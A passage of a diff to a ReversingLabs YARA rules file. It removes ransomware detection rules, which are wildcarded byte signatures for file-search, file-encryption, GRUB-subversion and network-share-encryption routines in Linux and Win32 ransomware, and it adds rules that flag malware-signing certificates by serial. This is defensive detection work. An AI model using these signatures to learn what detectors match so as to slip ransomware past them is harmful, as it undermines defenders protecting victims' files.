-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
-            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
-        }
-		$subvert_grub_2 = {
-            48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48
-            8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ??
-            ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ??
-            ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85
-        }
-		$subvert_grub_3 = {
-            48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5
-            ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D
-            B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B
-            55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $search_files and ( all of ( $encrypt_files_* ) ) and ( all of ( $subvert_grub_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and ( pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures [ i ] . serial == "c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" ) and 1602201600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ako ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "00d67696-998c-5bc3-95e7-0320ca558cdb"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "80e92980-f4eb-5ac2-9f68-14c352758791"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11706-L11722"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b"
+		logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ako"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_network_shares_win32_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B
-            4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95
-            ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$encrypt_network_shares_win32_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ??
-            ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52
-            8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ??
-            83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45
-        }
-		$encrypt_network_shares_win32_p3 = {
-            33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
-            C2
-        }
-		$find_files_win32_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03
-            D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB
-            ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D
-            C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74
-            ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B
-        }
-		$find_files_win32_p2 = {
-            8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ??
-            ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42
-            F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B
-            85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74
-            ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B
-            48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
-            ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ??
-            ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B
-            8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50
-            8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files_win32_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ??
-            75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32
-            C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ??
-            51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ??
-            ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B
-            8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52
-        }
-		$encrypt_files_win32_p2 = {
-            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
-            68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
-            ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ??
-            0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0
-            85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9
-            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D
-            ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85
-        }
-		$encrypt_files_win32_p3 = {
-            8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51
-            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
-            8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57
-            C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D
-            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_win32_p* ) ) and ( all of ( $encrypt_files_win32_p* ) ) and ( all of ( $encrypt_network_shares_win32_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CODE - HANDLE, s. r. o." and pe.signatures [ i ] . serial == "54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Montserrat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11724-L11742"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10"
+		logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Montserrat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
